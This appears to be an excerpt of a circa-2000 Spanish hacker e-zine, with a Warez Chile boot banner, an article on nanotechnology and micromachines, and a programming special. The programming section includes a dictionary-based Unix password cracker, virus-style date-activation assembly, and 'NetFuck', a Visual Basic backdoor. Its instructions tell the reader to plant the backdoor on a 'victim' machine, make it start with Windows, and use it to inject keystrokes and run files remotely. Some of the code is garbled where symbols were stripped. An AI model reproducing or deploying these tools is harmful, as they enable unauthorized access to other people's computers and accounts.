nota : para disco de 1024 cilindros (osea discos grandes o decentes)
el actual lilo no funciona, para lo cual
tendras que bajar esta version :
ftp://sd.dynhost.com/pub/linux/lilo/
no la he testeado todavia, pero dicen que funciona....
mi actual bootmesg.txt
-------------------------------------------------------------------------------
#####
#######
@ ##O#O##
###### @@# #VVVVV#
## # ## VVV ##
## @@@ ### #### ### ### ##### ###### # ##
## @ @# ### ## ## ## ### ## # ##
## @ @# ## ## ## ## ### # ###
## @@# ## ## ## ## ### QQ# ##Q
## # @@# ## ## ## ## ## ## QQQQQQ# #QQQQQQ
## ## @@# # ## ## ### ### ## ## QQQQQQQ# # #QQQQQQQ
############ ### #### #### #### ### ##### ###### QQQQQ#######QQQQQ
#WaReZ CHILE
http://www.warez.cl/
LiNuX Real SysTeM
One Intel Dual Pentium III 550 Mhz Processor, 128MB RAM.
-------------------------------------------------------------------------------
:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:
-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-
..--:: 08. Micro - Nano Tech ::--..
By TriNo
La sig es una recopilacion y mi interpretacion de articulos de microrobotica
y nanotecnologia desde muchos sitios de la web, de antemano mis disculpas a
los autores por la no mension de sus nombres ni url's ya que no los poseo.
TriNo
MICROROBOT Y SUS APLICACIONES
La poblacion de robots sigue creciendo a pasos agigantados. Muy pronto
formaran parte indisoluble del paisaje tecnologico, pasando a dominar muchas
areas de aplicacion.
Solo en los Estados Unidos, el numero de robots casi se doblo durante la
pasada decada. Su presencia se esta convirtiendo en tan importante en
operaciones como la exploracion espacial, la cirugia o la industria de
servicios, que es obvio que su poblacion continuara creciendo sin parar.
En 1985, era casi un sue~o integrar humanos y robots. Ahora existe un area
cientifica dedicada a la ergonomia de estos aparatos, lo cual facilita la
relacion hombre/maquina. En diversos procesos de fabricacion, agricultura y
construccion, los robots se hallan ya plenamente integrados en la labor de
los humanos.
Las constantes innovaciones en tecnologias que tienen que ver con los
controles electronicos, sensores, sistemas de vision computarizada, realidad
virtual, inteligencia artificial, nanotecnologia, etc., suponen un gran
impulso en el desarrollo de mejores robots.
A~adan a esto el debut de los micro y nano-robots, asi como los robots con
multiples brazos y patas, los cuales amplian el abanico de aplicaciones hasta
lugares insospechados
NANOTECNOLOGIA Y MICROMAQUINAS
Durante los pasados dias 29 y 30 de junio, se han reunido en el Instituto
Nacional de Tecnica Aerospacial cualificados expertos de las Universidades,
Organismos Publicos y Empresas mas representativas del pais para tratar sobre
el tema de las micro/nanotecnologias.
En las jornadas - de titulo El Estado de las Aplicaciones de las Micro/
Nanotecnologias- se han analizado los diferentes campos de utilizacion de las
Nuevas Tecnologias basadas en el uso de objetos, materiales y elementos cada
vez mas sencillos y diminutos.
No existe una frontera definida, ni en la dimension ni en el tiempo, entre
micro y nanotecnologia. Cuando ya estamos inmersos en la microelectronica,
entendida como la prolongacion a escala micrometrica de procesos como la
micromecanizacion o la litografia, las nanotecnologias, en su acepcion mas
general, -tecnicas de manipulacion o control a escala nanotecnica e incluso
molecular o atomica- no tendran aplicacion practica hasta dentro de unas
decadas.
Sin embargo, las previsiones apuntan a que estaran presentes en todos los
campos de las ciencias y supondran, segun los expertos, una revolucion solo
comparable a la que ha supuesto la microelectronica.
En todos los paises situados a la cabeza del desarrollo tecnologico, cobran
cada dia mas relevancia las investigaciones en estos campos, entendiendose
como un proceso de revolucion tecnologica posterior al vertiginoso cambio que
ha supuesto la microelectronica.
En estas jornadas celebradas en el INTA y que son continuacion de las que
tuvieron lugar en marzo de 1995 -organizadas tambien por este Instituto-, se
ha tratado el tema de las micro/nanotecnologias emergentes como la micro-
mecanizacion tridimensional, microsensores, materiales nanoestructurados,
asi como los sistemas microelectromecanicos; ya que de su desarrollo
provendran importantes beneficios para todos los sectores del mercado, como
aeronautica y espacio, comunicaciones y multimedia, biomedicina, control de
procesos industriales, etc.
NANOSATELITES
Los encuentros y conferencias han cubierto actividades en las areas mas
relevantes, como materiales, sensores, electromecanismos y microelectronica.
Tambien sus aplicaciones mas inmediatas en sectores como el espacio, la
biomedicina, la industria o las telecomunicaciones.
Una especial atencion merecieron las aplicaciones en el sector espacial. Se
hablo de los nanosatelites y del NANOSAT, proyecto de desarrollo de un
nanosatelite espa~ol, precisamente iniciado en 1995 y que sera lanzado al
espacio en el a~o 2001. El NANOSAT parte de un concepto ideado en el INTA y
cuya gestion y construccion se realiza totalmente en Espa~a, partiendo de una
nueva filosofia de dise~o: mas peque~o, mas potente, mas rapido, con una
aplicacion especifica concreta, con mayores prestaciones y menor consumo. El
exito en este proyecto de vanguardia puede suponer una importante presencia
espa~ola en la futura "peque~a revolucion en el espacio".
Las jornadas organizadas por el INTA y los sucesivos encuentros, pretenden
propiciar la discusion y analisis por parte de los expertos de las
actividades que en este campo se realizan en Espa~a.
MICROMAQUINAS DE DIAMANTE
No podras regalarselas a tu pareja en el dia de San Valentin, y son demasiado
peque~as para ser el mejor amigo de una mujer, pero a pesar de todo
cientificos americanos han creado lo que creen es la primera micromaquina de
diamante del mundo.
El diamante interesa a los investigadores por sus cualidades superiores en el
ambito de la dureza, resistencia al desgaste, a la friccion, etc. Tambien
tiene un gran potencial como material biocompatible, de manera que puede ser
usado dentro del cuerpo humano en aplicaciones medicas, sin que se produzca
una reaccion alergica.
En la carrera hacia la creacion de maquinas cada vez mas peque~as, tiene
sentido la construccion de algunas de ellas mediante este material, el
diamante amorfo, el mas duro en el mundo despues del diamante cristalino. Su
disposicion y la metodologia para su manipulacion es lo que estan
desarrollando diversos especialistas en los Sandia Laboratories.
Las primeras micromaquinas construidas mediante diamante son dispositivos
moviles de un milimetro cuadrado, donde sus diminutos dientes se mueven hacia
delante o hacia atras cuando una corriente electrica cambia de polaridad.
Como piezas basicas, formaran parte de otros complejos mas sofisticados.
Ya se han construido micromaquinas con otros materiales, como el polisilicio,
pero a pesar de su tama~o, siguen siendo susceptibles de desgaste. El
diamante ayudara a reducir este desgaste y a prolongar su vida util. Las
investigaciones sugieren que el diamante deberia durar 10.000 veces mas que
el polisilicio.
Los MEMs de silicio, sistemas microlectromecanicos, ya se usan en
aplicaciones tales como los "air bags" de los automoviles o en los
microespejos opticos que podrian ser desplegados en satelites artificiales.
Se trata de una tecnologia muy prometedora y con multiples aplicaciones.
El uso de diamante amorfo en vez diamante cristalino, que es mas duro aun, se
explica sabiendo que este ultimo necesita de temperaturas mucho mas altas
para ser sintetizado. Ademas, aplicado sobre superficies, proporciona una
terminacion rugosa, inapropiada para la tecnologia de multicapas empleada en
las micromaquinas
LOGRAN EL PRIMER LASER DE ATOMOS EN VEZ DE LUZ
Un equipo de fisicos del Massachusetts Institute of Technology (MIT), en
EEUU, ha conseguido desarrollar el primer laser de atomos, en vez de luz. El
hecho esta siendo recibido como un gran logro, ya que ha requerido controlar
el comportamiento de los atomos a temperaturas proximas al cero absoluto. El
nuevo laser todavia no tiene aplicaciones practicas, pero los expertos
consideran ya que se podra aplicar en el futuro para lograr relojes atomicos
mas precisos que los actuales, asi como "chips" de alta eficacia y hasta
micromaquinas que serian construidas atomo a atomo. En el experimento se han
utilizado atomos de sodio enfriados.
EL ATOMO ULTIMA FRONTERA
Varios investigadores de IBM estan trabajando en una nueva microtecnologia
que permitira guardar datos a nivel atomico.
Se~alan que la tecnologia magnetica actual esta llegando a su limite y
gracias a sus nuevas micromaquinas dentro de algunos a~os los discos duros
creceran en velocidad y tama~o.
Algun dia sera posible desarrollar un mecanismo diminuto capaz de identificar
cierta clase de atomos (como el carbono), atraparlos y apilarlos uno encima
de otro en una red regular. Estamos hablando de elaborar un diamante
sintetico.
Una fibra de esta materia tendria una resistencia muy superior al acero.
Quien puede imaginar hoy sus utilidades?:
Estructuras metalicas ultraligeras, puentes, aviones... Habra nacido una
nueva especialidad, la nanotecnologia Unas pocas disciplinas permiten
trabajar con mas finura a escalas submicroscopicas.
La quimica es una de ellas: mezclando dos componentes se produce, a veces, un
proceso en el que sus moleculas se combinan para formar otras, radicalmente
distintas. Nadie les da instrucciones; sencillamente, la Naturaleza funciona
asi.
La moderna microelectronica es otro ejemplo: construir un chip implica
controlar con enorme precision las proporciones en los que minusculas
cantidades de metales, como fosforo, boro, galio o arsenico, se intercalan en
la red cristalina del silicio para modificar sustancialmente sus propiedades.
Combinando zonas "dopadas" con uno u otro tipo de contaminantes se forman
transistores; combinando transistores, puertas logicas; combinando puertas
logicas, chips. Y, dentro del ordenador en el que se han redactado estas
palabras, hay unas cuantas docenas de chips que se encargan de que todo
funcione, la mayoria de veces como debe.
Segun las especificaciones apuntadas, el manipulador original podria crear un
clonico suyo en algo menos de tres horas, el cual, a su vez, podria hacer
otra copia, y otra, y asi sucesivamente. El primer dia habria casi
trescientas micromaquinas; en una semana se habria superado el trillon, como
en la leyenda del arroz y los cuadros del ajedrez.
No existen limitaciones para esta tecnologia... en teoria. El unico problema
serio estriba en proporcionar a las micromaquinas instrucciones muy
detalladas sobre lo que deben fabricar. Por ejemplo, el sue~o de las maquinas
productoras de alimentos listos para comer, que hasta ahora solo aparecia en
peliculas de anticipacion, podria muy bien llegar a materializarse, siempre y
cuando supieramos como elaborar, pongamos por caso, un bocadillo de jamon
serrano a partir de atomos de carbono, hidrogeno, oxigeno y unos cuantos
elementos mas.
Si alguna vez llegan a elaborarse, las consecuencias de las nanomaquinas
serian casi inabarcables.
Estos sue~os se desbocan en cuanto llegan al campo de la medicina. Hay quien
ve la posibilidad de levantar un mapa de los canales que permiten a los iones
atravesar las paredes celulares; otros ven nanorrobots inyectados en el
torrente sanguineo para localizar y destruir coagulos en arterias, celulas
mutantes o, incluso, encargados de reparar fragmentos de material genetico
da~ado.
Para muchos, la idea de estas maquinas corriendo desbocadas por el interior
del cuerpo es repulsiva; otros, en cambio, las consideran como la puerta de
acceso al sue~o de la eterna juventud.
Otro terreno bien abonado es el de la exploracion espacial: enviar una jauria
de nanomaquinas mineras devorando asteroides o un ejercito de microtejedoras
de velas solares de kilometros y kilometros de extension, con las que cubrir
el trayecto a Marte en unas pocas semanas. Existe, incluso, un ambiciosisimo
proyecto (teorico, por supuesto) para enviar sondas de exploracion a las
estrellas mas proximas.
Estarian formadas por millones de micromaquinas capaces de trabajar
cooperativamente para realizar diversas funciones, desde formar una antena
gigante hasta inspeccionar el entorno de la estrella o la busqueda de otros
planetas.
Su lanzamiento se haria mediante una catapulta en orbita en torno a la
Tierra, una especie de finisima hebra (solo unos pocos atomos de diametro) de
unos miles de kilometros de largo, que funcionaria como un motor lineal. La
velocidad de lanzamiento seria de un tercio de la de la luz, con
aceleraciones superiores a las 100.000 "ges". Cualquier ser humano o aparato
convencional quedaria reducido a pulpa, pero no una micromaquina, por la
misma razon que ninguna hormiga se mata por caer del techo al suelo.
Nadie dice que este escenario este a la vuelta de la esquina, pero quiza
tampoco se trata de una pura fantasia. El concepto de mover atomos
individuales es algo verdaderamente real, aunque, por supuesto, se haya
conseguido solamente a peque~a escala.
La primera de mostracion espectacular de estas tecnicas la consiguio Don
Eigler, en 1989, con la publicacion de la fotografia del logotipo IBM formado
por 35 atomos de xenon. Se habian llevado pacientemente a sus posiciones
exactas utilizando un microscopio de barrido por efecto tunel.
No hace demasiado tiempo se realizo una encuesta informal entre algunos
expertos en este campo y todos fueron unanimes en manifestar que los primeros
constructores moleculares pueden aparecer entre el a~o 2000 y el 2015, los
nanocomputadores, hacia el 2040, y los reparadores celulares, mas o menos, a
mediados del proximo siglo.
A pesar de lo lejano que los estudios parecen ser, hoy ya se utiliza
nanotecnologia en algunos campos de la ciencia, por ejemplo los procesos de
hibridacion van acompa~ados de un proceso creciente de miniaturizacion, para
producir eso que algunos cientificos llaman con bastante exactitud la
intraestrucura; termino con el que designan una esfera distinta de la
superestructura y la infraestructura, donde la reciente miniaturizacion
nanotecnologica favorece la intrusion intraorganica de la tecnica y sus
micromaquinas en el seno de lo vivo.
Desde las protesis evidentes de miembros y partes mecanicas del cuerpo.
Pasando por la sustitucion creciente de organos y tejidos naturales por
minusculas protesis artificiales como marcapasos, corneas, lentes
intraoculares, siliconas para los senos, colagenos para los labios, etc.
Al parecer esta tecnologia no tiene limites y en caso de desarrollarse esta
destinada a ser la aparente solucion a todos nuestros problemas, o la
destruccion de la especie, tal como se muestra en "Los Expedientes secretos
X" o en "Matrix" el mal uso de cualquier tecnologia autonoma puede ser el
comienzo del Fin o el fin de nuestros problemas.
TriNo.
:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:
-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-
..--:: 09. Programacion en 546.604.465 Pasos ::--..
By SHISEI BRUJO
(1) Introduccion.
(2) Programa en C++.
(3) Ejemplos en Assembler.
(4) Crackeador de passwords y Creador de diccionarios
(5) NetFuck v1.0 en Visual Basic.
(6) HTML para ultranovatos.
(7) Despedida.
*****************************************************************************
1) INTRODUCCION.
*****************************************************************************
Buenas noches a todos, este es un mini especial de programacion, para
todos los fanaticos de los computadores.
Los programas que se presentan a continuacion, pueden presentar
algunas fallas, pero si esto ocurre ustedes seran capaces de arreglarlas o
no ? y si no les gustan, no me importa, los programas estan hechos para
personas que les interesa la programacion, y que puede crear sus propios
programas, no como otras garrapatas que lo unico que saben hacer es
chuparse el trabajo de los demas, pero al final siempre pierden :)
Acerca del articulo: Me importa una real Huea de lo que hagas con
el, puedes enviarlo a otras revistas y decir que es tuyo, mostrarselos a tus
amigos, quemarlo, culiarlo, vomitarlo, etc. al fin y al cabo que los
conocimientos son mios, y nadie me los podra quitar, en cambio a ustedes
malditas ratas en el momento en que tengan que demostrar algo se acuerdan
de su mamita y se largan a llorar.
Tampoco no es mi intencion incitar a la legalidad, ya que mi
verdadera intencion es que los que quieren aprender programacion, puedan
aprender facilmente y divertidamente, ya que a nadie le gustaria por ej. que
yo mostrara una base de datos de una empresa o algo por el estilo.
NOTA I : Se recomienda el uso del editor de MS-DOS.
NOTA II : No me hago responsable de la gente con depresion aguda que mal
utilize estas herramientas.
NOTA III : Si ves pifias ortograficas, saltatelas, no voy a estar preocupado
por los hueas delicados, que se da~an los ojos con las faltas
ortograficas.
[NdE: Aunque no es costumbre hacerlo, me he tomado el tiempo para corregir
algunas faltas de ortografia.. igual, no todas...]
*****************************************************************************
2) FUENTES DE C++.
*****************************************************************************
Comenzaremos con un sencillo programa, que permite ingresar todos los
nombres de los archivos de la unidad C: con sus respectivos tama~os en un
solo archivo. Incluyendo los archivos ocultos.
Su utilidad no es mucha, pero te sirve para agregarlos en otros programas
mas grandes. Por ejemplo un programa que busque un archivo especifico para
despues cambiarlo o simplemente abrir todos los archivos que encuentre y
escribirles dentro "CHUPALO!!!" o algo por el estilo ;).
Este programa crea un archivo en "direct.bdd " en la raiz de tu
computador, dentro de el estan todos los nombres de los archivos con sus
respectivos tama~os, los nombres que tienen un * al lado son carpetas, y los
que tienen ** son sub-carpetas, y asi sucesivamente.
#include
#include
#include
void VerCarpetas();
void VerArchivos();
FILE *archivo;
int Num=0;
void main()
{
if ((archivo = fopen("\direct.bdd", "wt"))== NULL)
{
fprintf(stderr, "No se pudo abrir el archivo\n");
exit(1);
}
fputs("C:\n",archivo);
printf("Programado por Shisei Brujo.\n");
printf(" Mayo 2000");
printf("Guardando ");
chdir("\"); // cambia a raiz
VerCarpetas();
fclose(archivo);
printf("\nArchivo Ok.");
}
void VerArchivos()
{
char bytes[25];
int digitos = 8;
struct ffblk ffblk;
int NumArchivo;
NumArchivo = findfirst("*.*",&ffblk,2); // busca *.* archivos, incluye
while (!NumArchivo) // los ocultos
{
fputs("\t",archivo);
fputs(ffblk.ff_name, archivo);
fputs(" ",archivo);
gcvt(ffblk.ff_fsize, digitos, bytes);
fputs(bytes, archivo);
fputs("\n",archivo);
NumArchivo = findnext(&ffblk);
}
}
void VerCarpetas()
{
struct ffblk ffblk;
int NumArchivo,i;
VerArchivos();
NumArchivo = findfirst("*.*",&ffblk,16);
while (!NumArchivo)
{
if((ffblk.ff_name[0] != *".") && (ffblk.ff_attrib == 16))
{
Num++;
fputs(ffblk.ff_name, archivo);
if(Num<2)
printf(".");
for(i=0;i Shisei Brujo", 0ah, 0dh
db "Para los fanaticos de la programacion", 0ah, 0dh
Ejemplo ends
end start
Y ahora que suenen las campanas, porque este ejemplo hace sonar un lindo
beep :)
Campana segment
org 100h
assume cs:Campana
start:
mov ah, 2 ; llama a las interrupciones del beep
mov dl, 7 ; ni idea : (
int 21h ; suena el beep
int 20h ; vuelve al dos
Campana ends
end start
El siguiente ejemplo, es una de las rutinas que usan algunos virus ( por no
decir casi todos ) al momento de activarse ( los que se activan en una
fecha determinada ).
ejemplo segment
org 100h
assume cs:ejemplo
start:
mov ah, 02ah ;Chequea si es Septiembre
int 021h
cmp dh, 09d ;El 09d indica Septiembre
jne No_Ejecutar ;si no es, va a no_ejecutar
cmp dl, 10 ;Chequea si es 10
jne No_Ejecutar ;igual que arriba
mov ah,9
lea dx,mensaje
int 21h
int 20h
No_Ejecutar:
int 20h ;el int 20h indica que vuelva al DOS
Mensaje db 0ah,0dh
db "Este es un ejemplo de activacion por fecha", 0ah, 0dh
db "Echo por --> Shisei Brujo", 0ah, 0dh
db "Hoy es el dia Maldito", 0ah, 0dh
db "CHUPALO LARVA ASQUEROSA !!!$", 0ah, 0dh
ejemplo ends
end start
Para compilar, necesitan los archivos TLINK y TSAM, que lo pueden encontrar
en varias paginas dedicadas a los virus, y si ya los tienen, necesitan hacer
un "tsam " y luego "tlink -t ". ( por lo menos a mi me
resulta ) eso si, hay que tomar en cuenta que otros programas se compilan de
diferente forma, pero por lo menos estos ejemplos se compilan como ya les
dije.
Se ven dificiles de entender, pero si los analisas por un buen momento, los
modificas, pruebas, etc. lo entenderas.
Ademas que en esta revista han escrito sobre como trabajar en assembler, asi
que no se pueden quejar.
*****************************************************************************
4) Crackeador de passwords y Creador de diccionarios
*****************************************************************************
Este programa surgio cuando navegaba por ahi y encontre un programa
para crear diccionarios. Pero el problema de estos era que hacen
combinaciones de palabras que realmente no servirian para passwords, por
ejemplo, ustedes usarian la contrase~a "Blk3lZk3", no lo creo, ya que seria
muy dificil de recordar, y ademas que las personas comunes no usan ese tipo
de contrase~as.
Ademas imaginense cuantas contrase~as serian creadas, usando
las matematicas para ver cuantas combinaciones posibles hay en contrase~as
de seis caracteres obtenemos lo siguiente:
En cada caracter pueden haber 27 letras mayusculas, 27 minusculas y
10 numeros ( sin tomar en cuenta otros caracteres ).
entonces
_ _ _ _ _ _
64*64*64*64*64*64 = 64 elevado a 6
si su calculadora les acepta ese numero, su calculadora es marciana.
La otra cosa es que en una revista vi un programa, el cual modifique
a mi estilo, el cual tomaba palabras de un texto cualquiera, y las iba
comparando con la contrase~a.
Pero el problema era que tomaba palabras que no servian de nada, por
ejemplo "en", "la", etc. ademas de que hay palabras que se repiten un monton
de veces, or not ?.
Asi que me dedique a hacer un programa que buscara todas las
palabras en un texto cualquiera ( yo lo probe con el Proyecto_R #1 ), que
tuviera ciertas caracteristicas, la primera es que su cantidad de caracteres
fuera como uno la quisiera, por ejemplo el S.u.S.e ( linux ) acepta
contrase~as de 5 a 8 caracteres, asi que para que voy a querer otras
palabras mas chicas o mas grandes, y lo otro es que no se repitiera ( para
que voy a querer verificar la misma palabra dos veces ).
A continuacion el programa que crea diccionarios, espero que lo
comprendan, o al menos les sirva ( y si no les gusta metanselo en la ... )
#include
void Recuperar(char *archivo, char *dicc, int min, int max);
main(int argc, char *argv[])
{
if(argc!=5)
{
printf("Uso: ./crea
\n");
exit(0);
}
printf("\n Creador de Diccionarios");
printf("\n Desarrollado por Shisei Brujo");
printf("\n
Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
");
printf("\n Mayo 2000");
printf("\n\nArchivo de texto: %s", argv[1]);
printf("\nArchivo de salida: %s", argv[2]);
printf("\nNumero de palabras: ");
Recuperar(argv[1], argv[2], atoi(argv[3]), atoi(argv[4]));
}
void Recuperar(char *archivo, char *dicc, int min, int max)
{
char dato[1][20], palabras[15000][20], pass[15000][20];
FILE *Archivo, *Diccionario;
int cont,x,igual,i,j=0,tmp;
int Num=0, NumPass=1;
if ((Archivo = fopen(archivo,"r")) == NULL)
{
printf("\nError abriendo archivo %s\n", archivo);
exit(0);
}
if ((Diccionario = fopen(dicc,"w")) == NULL)
{
printf("\nError abriendo archivo %s\n", dicc);
exit(0);
}
while(!feof(Archivo))
{
cont=0;
do{
dato[0][cont]=fgetc(Archivo);
tmp = toascii(dato[0][cont]);
cont++;
}while((!feof(Archivo)) && (cont<20) && (tmp>48) && (tmp<123)
&& tmp!=58 && tmp!=59 && tmp!=60 && tmp!=61 && tmp!=62 && tmp!=63 && tmp!=64
&& tmp!=91 && tmp!=92 && tmp!=93 && tmp!=94 && tmp!=95 && tmp!=96);
dato[0][cont-1]='\x0';
cont--;
if((contmin-1))
{
for(x=0; x
#include
void RecuperarPasswords(char *archivo_passwords);
void Diccionario(char *diccionario);
char datos[20][30];
int NumClave;
main(int argc, char *argv[])
{
printf("\n Juan de Ripio v1.0\n");
printf(" Programado por Shisei Brujo\n");
printf(" Abril 2000\n\n");
if(argc!=3)
{
printf("Uso: Juan \n");
exit(0);
}
RecuperarPasswords(argv[2]);
Diccionario(argv[1]);
}
void RecuperarPasswords(char *archivo_passwords)
{
FILE *Archivo;
int cont;
NumClave=0;
if ((Archivo = fopen(archivo_passwords,"r")) == NULL)
{
printf("\nError abriendo archivo %s\n", archivo_passwords);
exit(0);
}
while(!feof(Archivo))
{
cont=0;
do{
datos[NumClave][cont]=fgetc(Archivo);
cont++;
}while((datos[NumClave][cont-1]!='\n') && (datos[NumClave][cont-1]!=':') && (!feof(Archivo)));
datos[NumClave][cont-1]='\x0';
NumClave++;
}
fclose(Archivo);
NumClave/=2;
}
void Diccionario(char *diccionario)
{
FILE *Archivo;
char entrada[200], *crypt(), *resultado;
int cont, x,i=0, j;
if((Archivo = fopen(diccionario, "r")) == NULL)
{
printf("\nError abriendo archivo %s\n", diccionario);
exit(0);
}
while(!feof(Archivo))
{
cont=0;
j=1;
do{
entrada[cont]=fgetc(Archivo);
cont++;
}while((entrada[cont-1]!='\n') && (entrada[cont-1]!=',') && (entrada[cont-1]!='.') &&
(entrada[cont-1]!=' ') && (entrada[cont-1]!=';') && (entrada[cont-1]!=':') &&
(!feof(Archivo)));
entrada[cont-1]='\x0';
for(x=0;x 0 Then ' Si cambia es que tiene una orden
Open CurDir + "\orden.bdd" For Input As #1
Input #1, Codigo
If Codigo = 1 Then
Close
Input #1, Mensaje
SendKeys Mensaje, True ' envia las pulsaciones de teclado
End If
If Codigo = 2 Then
Close
Valor = Shell(CurDir + "\esclavo.exe", 1) 'ejecuta el esclavo
AppActivate Valor ' para mostrar mensajes
End If
If Codigo = 3 Then
Input #1, Mensaje
Close
Valor = Shell(Mensaje, 1) ' ejecuta el archivo "Mensaje"
AppActivate Valor
End If
Open CurDir + "\orden.bdd" For Output As #1
Close
End If
Loop
Abriendo: ' si no encuentra el archivo "orden.bdd" crea uno sin nada
Open CurDir + "\orden.bdd" For Output As #1
Close
Resume Next
End Sub
Luego crearemos el archivo Esclavo.exe, que como su nombre lo dice,
va a ser el esclavo de WinFuck.exe, y va a servir para enviar varios
mensajes a la vez, ya que si lo hiciera solo el WinFuck, habria que esperar
que el otro usuario (o victima ;) presione "aceptar" para enviar otro
mensaje.
Private Sub Form_Load()
Open CurDir + "\orden.bdd" For Input As #1
Input #1, codigo
Input #1, titulo
Input #1, mensaje
Input #1, estilo
Close
MsgBox mensaje, estilo, titulo ' muestra el mensaje
Unload Form1
End Sub
Y finalmente crearemos el NetFuck.exe que consta de:
- 3 TextBox: uno para pedir la ruta del WinFuck (por ej. \equipo2\c\windows)
el otro para pedir ya sea el texto a enviar, el mensaje o el archivo a
ejecutar, y el ultimo nos pide el titulo del mensaje ( por ej. "error" ).
- 3 OptionButton: Estos son para pedir los estilos de los mensajes, pueden
ser de exclamacion, un mensaje cualquiera, o de advertencia.
- 3 Command: Uno va a ser para enviar mensajes, otro para ejecutar archivos,
y el otro para enviar Keys.
y lleva el siguiente fuente:
Private Sub Command1_Click() ' boton para enviar pulsaciones
If Texto.Text = "" Then
MsgBox "Tiene que ingresar un texto.", 16
Else
If Ruta.Text = "" Then
MsgBox "Tiene que ingresar la ruta de WinFuck.", 16
Else
On Error Resume Next
Open Ruta.Text + "\orden.bdd" For Output As #1
If Err.Number = 76 Or Err.Number = 53 Then
MsgBox "La ruta de WinFuck es incorrecta.", 16
Err.Clear
Exit Sub
End If
Print #1, 1
Print #1, Texto.Text
Close
MsgBox "El comando fue enviado con exito", 48
End If
End If
End Sub
Private Sub Command2_Click() ' boton para enviar un mensaje
If Texto.Text = "" Then
MsgBox "Tiene que ingresar un texto.", 16
Else
If Ruta.Text = "" Then
MsgBox "Tiene que ingresar la ruta de WinFuck.", 16
Else
On Error Resume Next
Open Ruta.Text + "\orden.bdd" For Output As #1
If Err.Number = 76 Or Err.Number = 53 Then
MsgBox "La ruta de WinFuck es incorrecta.", 16
Err.Clear
Exit Sub
End If
If Option1.Value = True Then
Print #1, 2
Print #1, Titulo.Text
Print #1, Texto.Text
Print #1, 16
Else
If Option2.Value = True Then
Print #1, 2
Print #1, Titulo.Text
Print #1, Texto.Text
Print #1, 48
Else
Print #1, 2
Print #1, Titulo.Text
Print #1, Texto.Text
Print #1, 64
End If
End If
End If
Close
MsgBox "El comando fue enviado con exito.", 48
End If
End Sub
Private Sub Command3_Click() ' este boton es para ejecutar programas
If Texto.Text = "" Then
MsgBox "Tiene que ingresar un Archivo.", 16
Else
If Ruta.Text = "" Then
MsgBox "Tiene que ingresar la ruta de WinFuck.", 16
Else
On Error Resume Next
Open Ruta.Text + "\orden.bdd" For Output As #1
If Err.Number = 76 Or Err.Number = 53 Then
MsgBox "La ruta de WinFuck es incorrecta.", 16
Err.Clear
Exit Sub
End If
Print #1, 3
Print #1, Texto.Text
Close
End If
MsgBox "El commando fue enviado con exito.", 48
End If
End Sub
Private Sub Form_Load() ' le da valores a los objetos al cargarse
Option1.Value = 1
Titulo.Text = "Mensaje"
End Sub
En escencia lo que estos tres programas hacen es:
WinFuck:
Revisa si el peso del archivo "orden.bdd" cambia, si es asi lo abre,
rescata el codigo y:
si es 1 envia las pulsaciones con la funcion sendkeys.
si es 2 ejecuta el esclavo para que este muestre el o los mensajes.
si es 3 ejecuta el archivo indicado.
Esclavo:
rescata las caracteristicas del mensaje (titulo, estilo, mensaje) y
lo muestra.
NetFuck:
Lo unico que hace es cambiar el orden.bdd para ingresarle el codigo y
las caracteristicas de la orden. Si se quiere mandar pulsaciones de teclado,
graba el No.1 seguido de las teclas por ej.
1
hola!
( eso lo graba en orden.bdd )
si se quiere mandar un mensaje, graba el No.2, el titulo, el cuerpo del
mensaje y luego el estilo, por ej.
2
Mensaje
si te gusta chuparlo solo sonrie ;)
16
( el 16 es para advertencia, 48 mensaje, 62 exclamacion )
si se quiere ejecutar un archivo, graba el No.3 y la ruta del archivo,
por ej.
3
\equipo2\c\windows\command\command.com
Ojala lo hayan entendido y lo trabajen harto, que aunque igual es un poco
restringido, en algunas ocasiones nos puede ayudar de una forma increible ;)
Como usarlo:
Se copia el archivo WinFuck.exe, y el archivo Esclavo.exe en la
maquina "victima", los dos juntos!.
Se ejecuta el archivo WinFuck.exe en el computador "victima", tambien
se puede dejar para que se ejecute cada vez que se inicie windows editando el
win.ini agregando la linea
load="C:\WINDOWS\WINFUCK.EXE"
Luego de la otra maquina ( la tuya ) ejecutas el NetFuck.exe y le
indicas la ruta del WinFuck por ej. "\equipo2\c\windows", escribes un
mensaje, las pulsaciones a enviar o el archivo a ejecutar y presionas el
boton correspondiente. y listo.
*****************************************************************************
6) HTML PARA ULTRANOVATOS.
*****************************************************************************
Para los insectos que no sepan lo que es HTML:
Es uno de los lenguajes que se utilizan en la creacion de paginas web, no
necesita un compilador, tan solo un editor de textos, por ejemplo el editor
de DOS o el NOTEPAD, etc. Es tan solo una introduccion, asi que los compadres
que saben un poco, mejor larguense a otro articulo.
Abran un archivo y coloquen al principio del archivo y al
final, ya que esto indica que es un archivo de HTML ( pag. wesh ).
Luego colocaremos el titulo a la pagina, para esto escribimos dentro
de la funci¢n <HEAD> luego y lo terminamos con ,
por ejemplo:
BIENVENIDO A MI PRIMERA PAGINA.
Nota para ultranovatos : todos estos archivos se guardan con la extension
.html or .htm
Ahora, le colocaremos un mensaje a nuestra pagina :
BIENVENIDO A MI PRIMERA PAGINA
HOLA YO SOY JUAN PEREZ ESTA ES MI PAGINA WESH ...
Si colocas antes del mensaje y despues del mensaje, la letra
se agrandara, prueba tambien con .
Por si no te has dado cuenta, cuando abres un comando <...>, despues
tienes que cerrarlo con .
Esta quedando bonita Jaaa!. Pero para arreglarla un poco, le vamos a poner
un poco de color, que te parece un fondo negro y letras rojas.
BIENVENIDO A MI PRIMERA PAGINA
HOLA YO SOY JUAN PEREZ ESTA ES MI PAGINA WESH ...
NOTA : Se supone que el huea que lee esto, conoce los nombres de los colores
en ingles.
Jaaa! Quedo entera fea todavia, pero como ustedes son gusanos inteligentes y
creativos usaran todo su maldito cerebro para tratar de que su pagina sea un
poco mas soportable Jaaa!.
Yap, ahora ustedes piensan que su pagina les quedaria mucho mas bonita si
le colocasen una imagen, el siguiente comando te sirve para eso:
La funcion es para centrar, ya sea texto o imagenes, WIDTH es el
